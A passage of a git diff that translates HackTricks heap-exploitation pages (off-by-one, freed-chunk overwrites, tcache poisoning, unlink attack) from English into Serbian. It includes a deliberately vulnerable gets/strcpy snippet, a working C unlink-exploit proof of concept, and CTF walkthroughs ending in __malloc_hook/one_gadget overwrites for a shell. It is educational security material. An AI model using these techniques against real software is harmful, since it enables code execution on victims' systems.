+Imati pristup 1B overflow-u omogućava napadaču da izmeni `size` polje sledećeg dela. Ovo omogućava manipulaciju kojim delovima su zapravo oslobođeni, potencijalno generišući deo koji sadrži još jedan legitiman deo. Eksploatacija je slična [double free](double-free.md) ili preklapanju delova.
 
-There are 2 types of off by one vulnerabilities:
+Postoje 2 tipa off by one ranjivosti:
 
-- Arbitrary byte: This kind allows to overwrite that byte with any value
-- Null byte (off-by-null): This kind allows to overwrite that byte only with 0x00
-  - A common example of this vulnerability can be seen in the following code where the behavior of `strlen` and `strcpy` is inconsistent, which allows set a 0x00 byte in the beginning of the next chunk.
-  - This can be expoited with the [House of Einherjar](house-of-einherjar.md).
-  - If using Tcache, this can be leveraged to a [double free](double-free.md) situation.
+- Arbitrary byte: Ova vrsta omogućava prepisivanje tog bajta bilo kojom vrednošću
+- Null byte (off-by-null): Ova vrsta omogućava prepisivanje tog bajta samo sa 0x00
+- Uobičajen primer ove ranjivosti može se videti u sledećem kodu gde je ponašanje `strlen` i `strcpy` nekonzistentno, što omogućava postavljanje 0x00 bajta na početak sledećeg dela.
+- Ovo se može iskoristiti sa [House of Einherjar](house-of-einherjar.md).
+- Ako se koristi Tcache, ovo se može iskoristiti za situaciju [double free](double-free.md).
 
 

 
 Off-by-null
-
 ```c
 // From https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/off_by_one/
 int main(void)
 {
-    char buffer[40]="";
-    void *chunk1;
-    chunk1 = malloc(24);
-    puts("Get Input");
-    gets(buffer);
-    if(strlen(buffer)==24)
-    {
-        strcpy(chunk1,buffer);
-    }
-    return 0;
+char buffer[40]="";
+void *chunk1;
+chunk1 = malloc(24);
+puts("Get Input");
+gets(buffer);
+if(strlen(buffer)==24)
+{
+strcpy(chunk1,buffer);
+}
+return 0;
 }
 ```
-
 

 
-Among other checks, now whenever a chunk is free the previous size is compared with the size configured in the metadata's chunk, making this attack fairly complex from version 2.28.
+Među ostalim proverama, sada kada je deo slobodan, prethodna veličina se upoređuje sa veličinom konfigurisanim u metapodacima, što ovu napad čini prilično složenim od verzije 2.28.
 
-### Code example:
+### Primer koda:
 
 - [https://github.com/DhavalKapil/heap-exploitation/blob/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/shrinking_free_chunks.c](https://github.com/DhavalKapil/heap-exploitation/blob/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/shrinking_free_chunks.c)
-- This attack is no longer working due to the use of Tcaches.
-  - Moreover, if you try to abuse it using larger chunks (so tcaches aren't involved), you will get the error: `malloc(): invalid next size (unsorted)`
+- Ovaj napad više ne funkcioniše zbog korišćenja Tcaches.
+- Štaviše, ako pokušate da ga zloupotrebite koristeći veće delove (tako da tcaches nisu uključeni), dobićete grešku: `malloc(): invalid next size (unsorted)`
 
-### Goal
+### Cilj
 
-- Make a chunk be contained inside another chunk so writing access over that second chunk allows to overwrite the contained one
+- Napraviti deo koji je sadržan unutar drugog dela tako da pisanje pristupa preko tog drugog dela omogućava prepisivanje sadržanog dela
 
-### Requirements
+### Zahtevi
 
-- Off by one overflow to modify the size metadata information
+- Off by one overflow za modifikaciju informacija o veličini metapodataka
 
-### General off-by-one attack
+### Opšti off-by-one napad
 
-- Allocate three chunks `A`, `B` and `C` (say sizes 0x20), and another one to prevent consolidation with the top-chunk.
-- Free `C` (inserted into 0x20 Tcache free-list).
-- Use chunk `A` to overflow on `B`. Abuse off-by-one to modify the `size` field of `B` from 0x21 to 0x41.
-- Now we have `B` containing the free chunk `C`
-- Free `B` and allocate a 0x40 chunk (it will be placed here again)
-- We can modify the `fd` pointer from `C`, which is still free (Tcache poisoning)
+- Alocirati tri dela `A`, `B` i `C` (recimo veličine 0x20), i još jedan da se spreči konsolidacija sa top-chunk.
+- Osloboditi `C` (ubacen u 0x20 Tcache slobodnu listu).
+- Koristiti deo `A` da preplavi `B`. Zloupotrebiti off-by-one da modifikujete polje `size` `B` sa 0x21 na 0x41.
+- Sada imamo `B` koji sadrži slobodan deo `C`
+- Osloboditi `B` i alocirati 0x40 deo (ponovo će biti postavljen ovde)
+- Možemo modifikovati `fd` pokazivač iz `C`, koji je još uvek slobodan (Tcache trovanje)
 
-### Off-by-null attack
+### Off-by-null napad
 
-- 3 chunks of memory (a, b, c) are reserved one after the other. Then the middle one is freed. The first one contains an off by one overflow vulnerability and the attacker abuses it with a 0x00 (if the previous byte was 0x10 it would make he middle chunk indicate that it’s 0x10 smaller than it really is).
-- Then, 2 more smaller chunks are allocated in the middle freed chunk (b), however, as `b + b->size` never updates the c chunk because the pointed address is smaller than it should.
-- Then, b1 and c gets freed. As `c - c->prev_size` still points to b (b1 now), both are consolidated in one chunk. However, b2 is still inside in between b1 and c.
-- Finally, a new malloc is performed reclaiming this memory area which is actually going to contain b2, allowing the owner of the new malloc to control the content of b2.
+- 3 dela memorije (a, b, c) su rezervisana jedan za drugim. Zatim je srednji deo oslobođen. Prvi deo sadrži off by one overflow ranjivost i napadač je zloupotrebljava sa 0x00 (ako je prethodni bajt bio 0x10, to bi učinilo da srednji deo pokazuje da je 0x10 manji nego što zapravo jeste).
+- Zatim, 2 manja dela su alocirana u oslobođenom delu (b), međutim, pošto `b + b->size` nikada ne ažurira deo c jer je pokazana adresa manja nego što bi trebala.
+- Zatim, b1 i c se oslobađaju. Pošto `c - c->prev_size` još uvek pokazuje na b (sada b1), oba se konsoliduju u jedan deo. Međutim, b2 je još uvek unutra između b1 i c.
+- Na kraju, izvršava se nova malloc koja preuzima ovo područje memorije koje će zapravo sadržati b2, omogućavajući vlasniku nove malloc da kontroliše sadržaj b2.
 
-This image explains perfectly the attack:
+Ova slika savršeno objašnjava napad:
 
 
https://heap-exploitation.dhavalkapil.com/attacks/shrinking_free_chunks

 
-## Other Examples & References
+## Ostali primeri i reference
 
 - [**https://heap-exploitation.dhavalkapil.com/attacks/shrinking_free_chunks**](https://heap-exploitation.dhavalkapil.com/attacks/shrinking_free_chunks)
 - [**Bon-nie-appetit. HTB Cyber Apocalypse CTF 2022**](https://7rocky.github.io/en/ctf/htb-challenges/pwn/bon-nie-appetit/)
-  - Off-by-one because of `strlen` considering the next chunk's `size` field.
-  - Tcache is being used, so a general off-by-one attacks works to get an arbitrary write primitive with Tcache poisoning.
+- Off-by-one zbog `strlen` koji uzima u obzir polje `size` sledećeg dela.
+- Tcache se koristi, tako da opšti off-by-one napadi funkcionišu da dobiju proizvoljnu write primitivu sa Tcache trovanjem.
 - [**Asis CTF 2016 b00ks**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/off_by_one/#1-asis-ctf-2016-b00ks)
-  - It's possible to abuse an off by one to leak an address from the heap because the byte 0x00 of the end of a string being overwritten by the next field.
-  - Arbitrary write is obtained by abusing the off by one write to make the pointer point to another place were a fake struct with fake pointers will be built. Then, it's possible to follow the pointer of this struct to obtain arbitrary write.
-  - The libc address is leaked because if the heap is extended using mmap, the memory allocated by mmap has a fixed offset from libc.
-  - Finally the arbitrary write is abused to write into the address of \_\_free_hook with a one gadget.
+- Moguće je zloupotrebiti off by one da se otkrije adresa iz heap-a jer bajt 0x00 na kraju stringa bude prepisan sledećim poljem.
+- Proizvoljno pisanje se dobija zloupotrebom off by one pisanja da se pokazivač usmeri na drugo mesto gde će biti izgrađena lažna struktura sa lažnim pokazivačima. Zatim, moguće je pratiti pokazivač ove strukture da bi se dobilo proizvoljno pisanje.
+- libc adresa se otkriva jer ako se heap proširi koristeći mmap, memorija alocirana od mmap ima fiksni offset od libc.
+- Na kraju, proizvoljno pisanje se zloupotrebljava da se piše u adresu \_\_free_hook sa jednim gadgetom.
 - [**plaidctf 2015 plaiddb**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/off_by_one/#instance-2-plaidctf-2015-plaiddb)
-  - There is a NULL off by one vulnerability in the `getline` function that reads user input lines. This function is used to read the "key" of the content and not the content.
-  - In the writeup 5 initial chunks are created:
-    - chunk1 (0x200)
-    - chunk2 (0x50)
-    - chunk5 (0x68)
-    - chunk3 (0x1f8)
-    - chunk4 (0xf0)
-    - chunk defense (0x400) to avoid consolidating with top chunk
-  - Then chunk 1, 5 and 3 are freed, so:
-    - ```python
-      [ 0x200 Chunk 1 (free) ] [ 0x50 Chunk 2 ] [ 0x68 Chunk 5 (free) ] [ 0x1f8 Chunk 3 (free) ] [ 0xf0 Chunk 4 ] [ 0x400 Chunk defense ]
-      ```
-  - Then abusing chunk3 (0x1f8) the null off-by-one is abused writing the prev_size to `0x4e0`.
-    - Note how the sizes of the initially allocated chunks1, 2, 5 and 3 plus the headers of 4 of those chunks equals to `0x4e0`: `hex(0x1f8 + 0x10 + 0x68 + 0x10 + 0x50 + 0x10 + 0x200) = 0x4e0`
-  - Then, chunk 4 is freed, generating a chunk that consumes all the chunks till the beginning:
-    - ```python
-      [ 0x4e0 Chunk 1-2-5-3 (free) ] [ 0xf0 Chunk 4 (corrupted) ] [ 0x400 Chunk defense ]
-      ```
-    - ```python
-      [ 0x200 Chunk 1 (free) ] [ 0x50 Chunk 2 ] [ 0x68 Chunk 5 (free) ] [ 0x1f8 Chunk 3 (free) ] [ 0xf0 Chunk 4 ] [ 0x400 Chunk defense ]
-      ```
-  - Then, `0x200` bytes are allocated filling the original chunk 1
-    - And another 0x200 bytes are allocated and chunk2 is destroyed and therefore there isn't no fucking leak and this doesn't work? Maybe this shouldn't be done
-  - Then, it allocates another chunk with 0x58 "a"s (overwriting chunk2 and reaching chunk5) and modifies the `fd` of the fast bin chunk of chunk5 pointing it to `__malloc_hook`
-  - Then, a chunk of 0x68 is allocated so the fake fast bin chunk in `__malloc_hook` is the following fast bin chunk
-  - Finally, a new fast bin chunk of 0x68 is allocated and `__malloc_hook` is overwritten with a `one_gadget` address
+- Postoji NULL off by one ranjivost u funkciji `getline` koja čita linije korisničkog unosa. Ova funkcija se koristi za čitanje "ključa" sadržaja, a ne samog sadržaja.
+- U pisanju se kreira 5 inicijalnih delova:
+- chunk1 (0x200)
+- chunk2 (0x50)
+- chunk5 (0x68)
+- chunk3 (0x1f8)
+- chunk4 (0xf0)
+- chunk odbrane (0x400) da se izbegne konsolidacija sa top chunk
+- Zatim se oslobađaju chunk 1, 5 i 3, tako da:
+- ```python
+[ 0x200 Chunk 1 (free) ] [ 0x50 Chunk 2 ] [ 0x68 Chunk 5 (free) ] [ 0x1f8 Chunk 3 (free) ] [ 0xf0 Chunk 4 ] [ 0x400 Chunk defense ]
+```
+- Zatim zloupotrebljavajući chunk3 (0x1f8) null off-by-one se zloupotrebljava pišući prev_size na `0x4e0`.
+- Obratite pažnju na to kako veličine inicijalno alociranih chunk1, 2, 5 i 3 plus zaglavlja 4 od tih chunkova jednako je `0x4e0`: `hex(0x1f8 + 0x10 + 0x68 + 0x10 + 0x50 + 0x10 + 0x200) = 0x4e0`
+- Zatim, chunk 4 se oslobađa, generišući chunk koji konzumira sve delove do početka:
+- ```python
+[ 0x4e0 Chunk 1-2-5-3 (free) ] [ 0xf0 Chunk 4 (corrupted) ] [ 0x400 Chunk defense ]
+```
+- ```python
+[ 0x200 Chunk 1 (free) ] [ 0x50 Chunk 2 ] [ 0x68 Chunk 5 (free) ] [ 0x1f8 Chunk 3 (free) ] [ 0xf0 Chunk 4 ] [ 0x400 Chunk defense ]
+```
+- Zatim, alocira se `0x200` bajtova popunjavajući originalni chunk 1
+- I još `0x200` bajtova se alocira i chunk2 se uništava i stoga nema nikakvog curenja i ovo ne funkcioniše? Možda ovo ne bi trebalo raditi
+- Zatim, alocira još jedan chunk sa 0x58 "a"s (prepisujući chunk2 i dosegnuvši chunk5) i modifikuje `fd` brzog bin chunk-a chunk5 tako da pokazuje na `__malloc_hook`
+- Zatim, alocira se chunk od 0x68 tako da lažni brzi bin chunk u `__malloc_hook` bude sledeći brzi bin chunk
+- Na kraju, alocira se novi brzi bin chunk od 0x68 i `__malloc_hook` se prepisuje sa adresom `one_gadget`
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md b/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md
index 117f462b6..f73776689 100644
--- a/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md
+++ b/src/binary-exploitation/libc-heap/overwriting-a-freed-chunk.md
@@ -1,23 +1,23 @@
-# Overwriting a freed chunk
+# Prepisivanje oslobođenog dela
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Several of the proposed heap exploitation techniques need to be able to overwrite pointers inside freed chunks. The goal of this page is to summarise the potential vulnerabilities that could grant this access:
+Nekoliko predloženih tehnika eksploatacije heap-a treba da može da prepisuje pokazivače unutar oslobođenih delova. Cilj ove stranice je da sumira potencijalne ranjivosti koje bi mogle omogućiti ovaj pristup:
 
-### Simple Use After Free
+### Jednostavno korišćenje nakon oslobađanja
 
-If it's possible for the attacker to **write info in a free chunk**, they could abuse this to overwrite the needed pointers.
+Ako je moguće da napadač **upiše informacije u oslobođeni deo**, mogli bi to iskoristiti da prepišu potrebne pokazivače.
 
-### Double Free
+### Duplo oslobađanje
 
-If the attacker can **`free` two times the same chunk** (free other chunks in between potentially) and make it be **2 times in the same bin**, it would be possible for the user to **allocate the chunk later**, **write the needed pointers** and then **allocate it again** triggering the actions of the chunk being allocated (e.g. fast bin attack, tcache attack...)
+Ako napadač može da **`oslobađa` isti deo dva puta** (oslobađajući druge delove između potencijalno) i učini da bude **2 puta u istom kontejneru**, bilo bi moguće da korisnik **kasnije alocira deo**, **upiše potrebne pokazivače** i zatim **ponovo alocira**, pokrećući akcije delova koji se alociraju (npr. brzi bin napad, tcache napad...)
 
-### Heap Overflow
+### Prelivanje heap-a
 
-It might be possible to **overflow an allocated chunk having next a freed chunk** and modify some headers/pointers of it.
+Moglo bi biti moguće **preliti alocirani deo koji ima pored oslobođeni deo** i izmeniti neke zaglavlja/pokazivače.
 
-### Off-by-one overflow
+### Prelivanje sa pomerajem od jedan
 
-In this case it would be possible to **modify the size** of the following chunk in memory. An attacker could abuse this to **make an allocated chunk have a bigger size**, then **`free`** it, making the chunk been **added to a bin of a different** size (bigger), then allocate the **fake size**, and the attack will have access to a **chunk with a size which is bigger** than it really is, **granting therefore an overlapping chunks situation**, which is exploitable the same way to a **heap overflow** (check previous section).
+U ovom slučaju bi bilo moguće **izmeniti veličinu** sledećeg dela u memoriji. Napadač bi mogao to iskoristiti da **napravi alocirani deo sa većom veličinom**, zatim **`oslobađa`** ga, čineći da deo bude **dodato u kontejner druge** veličine (veće), zatim alocirati **lažnu veličinu**, i napad će imati pristup **delu sa veličinom koja je veća** nego što zaista jeste, **omogućavajući tako situaciju preklapanja delova**, koja se može iskoristiti na isti način kao **prelivanje heap-a** (proverite prethodni odeljak).
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/libc-heap/tcache-bin-attack.md b/src/binary-exploitation/libc-heap/tcache-bin-attack.md
index 7c69db95c..9824d1d21 100644
--- a/src/binary-exploitation/libc-heap/tcache-bin-attack.md
+++ b/src/binary-exploitation/libc-heap/tcache-bin-attack.md
@@ -2,46 +2,46 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-For more information about what is a Tcache bin check this page:
+Za više informacija o tome šta je Tcache bin, proverite ovu stranicu:
 
 {{#ref}}
 bins-and-memory-allocations.md
 {{#endref}}
 
-First of all, note that the Tcache was introduced in Glibc version 2.26.
+Prvo, imajte na umu da je Tcache uveden u Glibc verziji 2.26.
 
-The **Tcache attack** (also known as **Tcache poisoning**) proposed in the [**guyinatuxido page**](https://guyinatuxedo.github.io/29-tcache/tcache_explanation/index.html) is very similar to the fast bin attack where the goal is to overwrite the pointer to the next chunk in the bin inside a freed chunk to an arbitrary address so later it's possible to **allocate that specific address and potentially overwrite pointes**.
+**Tcache napad** (poznat i kao **Tcache trovanje**) predložen na [**guyinatuxido stranici**](https://guyinatuxedo.github.io/29-tcache/tcache_explanation/index.html) je veoma sličan fast bin napadu gde je cilj prepisati pokazivač na sledeći deo u binu unutar oslobođenog dela na proizvoljnu adresu kako bi kasnije bilo moguće **alokovati tu specifičnu adresu i potencijalno prepisati pokazivače**.
 
-However, nowadays, if you run the mentioned code you will get the error: **`malloc(): unaligned tcache chunk detected`**. So, it's needed to write as address in the new pointer an aligned address (or execute enough times the binary so the written address is actually aligned).
+Međutim, danas, ako pokrenete pomenuti kod dobićete grešku: **`malloc(): unaligned tcache chunk detected`**. Dakle, potrebno je napisati kao adresu u novom pokazivaču usklađenu adresu (ili izvršiti binarni kod dovoljno puta tako da je napisana adresa zapravo usklađena).
 
-### Tcache indexes attack
+### Tcache indeksi napad
 
-Usually it's possible to find at the beginning of the heap a chunk containing the **amount of chunks per index** inside the tcache and the address to the **head chunk of each tcache index**. If for some reason it's possible to modify this information, it would be possible to **make the head chunk of some index point to a desired address** (like `__malloc_hook`) to then allocated a chunk of the size of the index and overwrite the contents of `__malloc_hook` in this case.
+Obično je moguće pronaći na početku heap-a deo koji sadrži **broj delova po indeksu** unutar tcache-a i adresu do **glavnog dela svakog tcache indeksa**. Ako iz nekog razloga bude moguće izmeniti ove informacije, bilo bi moguće **naterati glavni deo nekog indeksa da pokazuje na željenu adresu** (kao što je `__malloc_hook`) kako bi se zatim alokovao deo veličine indeksa i prepisali sadržaji `__malloc_hook` u ovom slučaju.
 
-## Examples
+## Primeri
 
 - CTF [https://guyinatuxedo.github.io/29-tcache/dcquals19_babyheap/index.html](https://guyinatuxedo.github.io/29-tcache/dcquals19_babyheap/index.html)
-  - **Libc info leak**: It's possible to fill the tcaches, add a chunk into the unsorted list, empty the tcache and **re-allocate the chunk from the unsorted bin** only overwriting the first 8B, leaving the **second address to libc from the chunk intact so we can read it**.
-  - **Tcache attack**: The binary is vulnerable a 1B heap overflow. This will be abuse to change the **size header** of an allocated chunk making it bigger. Then, this chunk will be **freed**, adding it to the tcache of chunks of the fake size. Then, we will allocate a chunk with the faked size, and the previous chunk will be **returned knowing that this chunk was actually smaller** and this grants up the opportunity to **overwrite the next chunk in memory**.\
-    We will abuse this to **overwrite the next chunk's FD pointer** to point to **`malloc_hook`**, so then its possible to alloc 2 pointers: first the legit pointer we just modified, and then the second allocation will return a chunk in **`malloc_hook`** that it's possible to abuse to write a **one gadget**.
+- **Libc info leak**: Moguće je napuniti tcache, dodati deo u nesortiranu listu, isprazniti tcache i **ponovo alocirati deo iz nesortiranog bina** samo prepisujući prvih 8B, ostavljajući **drugom adresom do libc iz dela netaknutu kako bismo mogli da je pročitamo**.
+- **Tcache napad**: Binarni kod je ranjiv na 1B heap overflow. Ovo će se iskoristiti da se promeni **header veličine** alociranog dela čineći ga većim. Zatim, ovaj deo će biti **oslobođen**, dodajući ga u tcache delova lažne veličine. Zatim ćemo alocirati deo sa lažnom veličinom, a prethodni deo će biti **vraćen znajući da je ovaj deo zapravo manji** i to pruža priliku da **prepišemo sledeći deo u memoriji**.\
+Iskoristićemo ovo da **prepišemo FD pokazivač sledećeg dela** da pokazuje na **`malloc_hook`**, tako da je moguće alocirati 2 pokazivača: prvo legitiman pokazivač koji smo upravo izmenili, a zatim će druga alokacija vratiti deo u **`malloc_hook`** koji je moguće iskoristiti za pisanje **one gadget**.
 - CTF [https://guyinatuxedo.github.io/29-tcache/plaid19_cpp/index.html](https://guyinatuxedo.github.io/29-tcache/plaid19_cpp/index.html)
-  - **Libc info leak**: There is a use after free and a double free. In this writeup the author leaked an address of libc by readnig the address of a chunk placed in a small bin (like leaking it from the unsorted bin but from the small one)
-  - **Tcache attack**: A Tcache is performed via a **double free**. The same chunk is freed twice, so inside the Tcache the chunk will point to itself. Then, it's allocated, its FD pointer is modified to point to the **free hook** and then it's allocated again so the next chunk in the list is going to be in the free hook. Then, this is also allocated and it's possible to write a the address of `system` here so when a malloc containing `"/bin/sh"` is freed we get a shell.
+- **Libc info leak**: Postoji korišćenje nakon oslobađanja i dvostruko oslobađanje. U ovom izveštaju autor je otkrio adresu libc čitajući adresu dela smeštenog u malom binu (kao da je otkrio iz nesortiranog bina, ali iz malog).
+- **Tcache napad**: Tcache se vrši putem **dvostrukog oslobađanja**. Isti deo se oslobađa dva puta, tako da unutar Tcache-a deo pokazuje na sebe. Zatim se alocira, njegov FD pokazivač se menja da pokazuje na **free hook** i zatim se ponovo alocira tako da će sledeći deo na listi biti u free hook-u. Zatim se ovo takođe alocira i moguće je ovde napisati adresu `system` tako da kada se oslobodi malloc koji sadrži `"/bin/sh"` dobijamo shell.
 - CTF [https://guyinatuxedo.github.io/44-more_tcache/csaw19_popping_caps0/index.html](https://guyinatuxedo.github.io/44-more_tcache/csaw19_popping_caps0/index.html)
-  - The main vuln here is the capacity to `free` any address in the heap by indicating its offset
-  - **Tcache indexes attack**: It's possible to allocate and free a chunk of a size that when stored inside the tcache chunk (the chunk with the info of the tcache bins) will generate an **address with the value 0x100**. This is because the tcache stores the amount of chunks on each bin in different bytes, therefore one chunk in one specific index generates the value 0x100.
-  - Then, this value looks like there is a chunk of size 0x100. Allowing to abuse it by `free` this address. This will **add that address to the index of chunks of size 0x100 in the tcache**.
-  - Then, **allocating** a chunk of size **0x100**, the previous address will be returned as a chunk, allowing to overwrite other tcache indexes.\
-    For example putting the address of malloc hook in one of them and allocating a chunk of the size of that index will grant a chunk in calloc hook, which allows for writing a one gadget to get a s shell.
+- Glavna ranjivost ovde je sposobnost da se `free` bilo koja adresa u heap-u ukazivanjem na njen offset.
+- **Tcache indeksi napad**: Moguće je alocirati i osloboditi deo veličine koja kada se čuva unutar tcache dela (deo sa informacijama o tcache binovima) generiše **adresu sa vrednošću 0x100**. Ovo je zato što tcache čuva broj delova u svakom binu u različitim bajtovima, stoga jedan deo u jednom specifičnom indeksu generiše vrednost 0x100.
+- Zatim, ova vrednost izgleda kao da postoji deo veličine 0x100. Omogućavajući da se iskoristi tako što se `free` ova adresa. Ovo će **dodati tu adresu u indeks delova veličine 0x100 u tcache**.
+- Zatim, **alokacija** dela veličine **0x100**, prethodna adresa će biti vraćena kao deo, omogućavajući prepisivanje drugih tcache indeksa.\
+Na primer, stavljajući adresu malloc hook u jedan od njih i alocirajući deo veličine tog indeksa dobićemo deo u calloc hook-u, što omogućava pisanje one gadget za dobijanje shell-a.
 - CTF [https://guyinatuxedo.github.io/44-more_tcache/csaw19_popping_caps1/index.html](https://guyinatuxedo.github.io/44-more_tcache/csaw19_popping_caps1/index.html)
-  - Same vulnerability as before with one extra restriction
-  - **Tcache indexes attack**: Similar attack to the previous one but using less steps by **freeing the chunk that contains the tcache info** so it's address is added to the tcache index of its size so it's possible to allocate that size and get the tcache chunk info as a chunk, which allows to add free hook as the address of one index, alloc it, and write a one gadget on it.
+- Ista ranjivost kao pre sa jednom dodatnom restrikcijom.
+- **Tcache indeksi napad**: Sličan napad kao prethodni, ali koristeći manje koraka oslobađanjem dela koji sadrži tcache informacije tako da se njegova adresa dodaje u tcache indeks njegove veličine, tako da je moguće alocirati tu veličinu i dobiti tcache informacije kao deo, što omogućava dodavanje free hook kao adresu jednog indeksa, alocirati ga i napisati one gadget na njemu.
 - [**Math Door. HTB Cyber Apocalypse CTF 2023**](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/math-door/)
-  - **Write After Free** to add a number to the `fd` pointer.
-  - A lot of **heap feng-shui** is needed in this challenge. The writeup shows how **controlling the head of the Tcache** free-list is pretty handy.
-  - **Glibc leak** through `stdout` (FSOP).
-  - **Tcache poisoning** to get an arbitrary write primitive.
+- **Write After Free** da se doda broj u `fd` pokazivač.
+- Puno **heap feng-shui** je potrebno u ovom izazovu. Izveštaj pokazuje kako je **kontrola glave Tcache** free-liste veoma korisna.
+- **Glibc leak** kroz `stdout` (FSOP).
+- **Tcache trovanje** za dobijanje proizvoljne write primitive.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/libc-heap/unlink-attack.md b/src/binary-exploitation/libc-heap/unlink-attack.md
index 959ff36db..a823a48eb 100644
--- a/src/binary-exploitation/libc-heap/unlink-attack.md
+++ b/src/binary-exploitation/libc-heap/unlink-attack.md
@@ -2,16 +2,15 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne Informacije
 
-When this attack was discovered it mostly allowed a WWW (Write What Where), however, some **checks were added** making the new version of the attack more interesting more more complex and **useless**.
+Kada je ovaj napad otkriven, uglavnom je omogućavao WWW (Write What Where), međutim, neki **provere su dodate** čineći novu verziju napada zanimljivijom, složenijom i **beskorisnom**.
 
-### Code Example:
+### Primer Koda:
 
 

 
-Code
-
+Kod
 ```c
 #include 
 #include 
@@ -21,109 +20,108 @@ When this attack was discovered it mostly allowed a WWW (Write What Where), howe
 // Altered from https://github.com/DhavalKapil/heap-exploitation/tree/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/unlink_exploit.c to make it work
 
 struct chunk_structure {
-  size_t prev_size;
-  size_t size;
-  struct chunk_structure *fd;
-  struct chunk_structure *bk;
-  char buf[10];               // padding
+size_t prev_size;
+size_t size;
+struct chunk_structure *fd;
+struct chunk_structure *bk;
+char buf[10];               // padding
 };
 
 int main() {
-  unsigned long long *chunk1, *chunk2;
-  struct chunk_structure *fake_chunk, *chunk2_hdr;
-  char data[20];
+unsigned long long *chunk1, *chunk2;
+struct chunk_structure *fake_chunk, *chunk2_hdr;
+char data[20];
 
-  // First grab two chunks (non fast)
-  chunk1 = malloc(0x8000);
-  chunk2 = malloc(0x8000);
-  printf("Stack pointer to chunk1: %p\n", &chunk1);
-  printf("Chunk1: %p\n", chunk1);
-  printf("Chunk2: %p\n", chunk2);
+// First grab two chunks (non fast)
+chunk1 = malloc(0x8000);
+chunk2 = malloc(0x8000);
+printf("Stack pointer to chunk1: %p\n", &chunk1);
+printf("Chunk1: %p\n", chunk1);
+printf("Chunk2: %p\n", chunk2);
 
-  // Assuming attacker has control over chunk1's contents
-  // Overflow the heap, override chunk2's header
+// Assuming attacker has control over chunk1's contents
+// Overflow the heap, override chunk2's header
 
-  // First forge a fake chunk starting at chunk1
-  // Need to setup fd and bk pointers to pass the unlink security check
-  fake_chunk = (struct chunk_structure *)chunk1;
-  fake_chunk->size = 0x8000;
-  fake_chunk->fd = (struct chunk_structure *)(&chunk1 - 3); // Ensures P->fd->bk == P
-  fake_chunk->bk = (struct chunk_structure *)(&chunk1 - 2); // Ensures P->bk->fd == P
+// First forge a fake chunk starting at chunk1
+// Need to setup fd and bk pointers to pass the unlink security check
+fake_chunk = (struct chunk_structure *)chunk1;
+fake_chunk->size = 0x8000;
+fake_chunk->fd = (struct chunk_structure *)(&chunk1 - 3); // Ensures P->fd->bk == P
+fake_chunk->bk = (struct chunk_structure *)(&chunk1 - 2); // Ensures P->bk->fd == P
 
-  // Next modify the header of chunk2 to pass all security checks
-  chunk2_hdr = (struct chunk_structure *)(chunk2 - 2);
-  chunk2_hdr->prev_size = 0x8000;  // chunk1's data region size
-  chunk2_hdr->size &= ~1;        // Unsetting prev_in_use bit
+// Next modify the header of chunk2 to pass all security checks
+chunk2_hdr = (struct chunk_structure *)(chunk2 - 2);
+chunk2_hdr->prev_size = 0x8000;  // chunk1's data region size
+chunk2_hdr->size &= ~1;        // Unsetting prev_in_use bit
 
-  // Now, when chunk2 is freed, attacker's fake chunk is 'unlinked'
-  // This results in chunk1 pointer pointing to chunk1 - 3
-  // i.e. chunk1[3] now contains chunk1 itself.
-  // We then make chunk1 point to some victim's data
-  free(chunk2);
-  printf("Chunk1: %p\n", chunk1);
-  printf("Chunk1[3]: %x\n", chunk1[3]);
+// Now, when chunk2 is freed, attacker's fake chunk is 'unlinked'
+// This results in chunk1 pointer pointing to chunk1 - 3
+// i.e. chunk1[3] now contains chunk1 itself.
+// We then make chunk1 point to some victim's data
+free(chunk2);
+printf("Chunk1: %p\n", chunk1);
+printf("Chunk1[3]: %x\n", chunk1[3]);
 
-  chunk1[3] = (unsigned long long)data;
+chunk1[3] = (unsigned long long)data;
 
-  strcpy(data, "Victim's data");
+strcpy(data, "Victim's data");
 
-  // Overwrite victim's data using chunk1
-  chunk1[0] = 0x002164656b636168LL;
+// Overwrite victim's data using chunk1
+chunk1[0] = 0x002164656b636168LL;
 
-  printf("%s\n", data);
+printf("%s\n", data);
 
-  return 0;
+return 0;
 }
 
 ```
-
 

 
-- Attack doesn't work if tcaches are used (after 2.26)
+- Napad ne funkcioniše ako se koriste tcaches (posle 2.26)
 
-### Goal
+### Cilj
 
-This attack allows to **change a pointer to a chunk to point 3 addresses before of itself**. If this new location (surroundings of where the pointer was located) has interesting stuff, like other controllable allocations / stack..., it's possible to read/overwrite them to cause a bigger harm.
+Ovaj napad omogućava da **promenite pokazivač na deo da pokazuje 3 adrese pre sebe**. Ako se ova nova lokacija (okolina gde je pokazivač bio smešten) sadrži zanimljive stvari, kao što su druge kontrolisane alokacije / stek..., moguće je pročitati/prepisati ih kako bi se izazvala veća šteta.
 
-- If this pointer was located in the stack, because it's now pointing 3 address before itself and the user potentially can read it and modify it, it will be possible to leak sensitive info from the stack or even modify the return address (maybe) without touching the canary
-- In order CTF examples, this pointer is located in an array of pointers to other allocations, therefore, making it point 3 address before and being able to read and write it, it's possible to make the other pointers point to other addresses.\
-  As potentially the user can read/write also the other allocations, he can leak information or overwrite new address in arbitrary locations (like in the GOT).
+- Ako je ovaj pokazivač bio smešten u steku, pošto sada pokazuje 3 adrese pre sebe i korisnik potencijalno može da ga pročita i izmeni, biće moguće da se otkriju osetljive informacije iz steka ili čak izmeni adresa povratka (možda) bez dodirivanja kanarija.
